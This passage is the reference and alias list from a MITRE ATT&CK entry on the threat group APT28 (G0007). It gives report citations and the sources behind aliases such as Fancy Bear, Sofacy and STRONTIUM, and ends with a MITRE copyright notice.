- [12] Symantec APT28 Oct 2018: Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
- [13] ESET Zebrocy May 2019: ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
- [14] US District Court Indictment GRU Oct 2018: Brady, S. (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al. Retrieved October 1, 2020.
- [15] APT28 (associated group name): (Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
- [16] Accenture SNAKEMACKEREL Nov 2018: Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
- [17] ESET Sednit Part 3: ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
- [18] FROZENLAKE (associated group name): (Citation: Leonard TAG 2023)
- [19] Fancy Bear (associated group name): (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
- [20] Forest Blizzard (associated group name): (Citation: Microsoft Threat Actor Naming July 2023)
- [21] Group 74 (associated group name): (Citation: Talos Seduploader Oct 2017)
- [22] GruesomeLarch (associated group name): (Citation: Nearest Neighbor Volexity)
- [23] IRON TWILIGHT (associated group name): (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
- [24] Kaspersky Sofacy: Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
- [25] Leonard TAG 2023: Billy Leonard. (2023, April 19). Ukraine remains Russia's biggest cyber focus in 2023. Retrieved March 1, 2024.
- [26] Microsoft STRONTIUM Aug 2019: MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
- [27] Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020: Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.
- [28] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- [29] Nearest Neighbor Volexity: Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.
- [30] Pawn Storm (associated group name): (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
- [31] SNAKEMACKEREL (associated group name): (Citation: Accenture SNAKEMACKEREL Nov 2018)
- [32] STRONTIUM (associated group name): (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
- [33] Securelist Sofacy Feb 2018: Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
- [34] Secureworks IRON TWILIGHT Active Measures March 2017: Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.
- [35] Secureworks IRON TWILIGHT Profile: Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
- [36] Sednit (associated group name): This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044). (Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
- [37] Sofacy (associated group name): This designation has been used in reporting both to refer to the threat group and its associated malware. (Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
- [38] Swallowtail (associated group name): (Citation: Symantec APT28 Oct 2018)
- [39] TG-4127 (associated group name): (Citation: SecureWorks TG-4127)
- [40] Talos Seduploader Oct 2017: Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
- [41] Threat Group-4127 (associated group name): (Citation: SecureWorks TG-4127)
- [42] TrendMicro Pawn Storm Dec 2020: Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm's Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
- [43] Tsar Team (associated group name): (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)
- [44] mitre-attack G0007: MITRE ATT&CK group entry G0007 (source object).
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.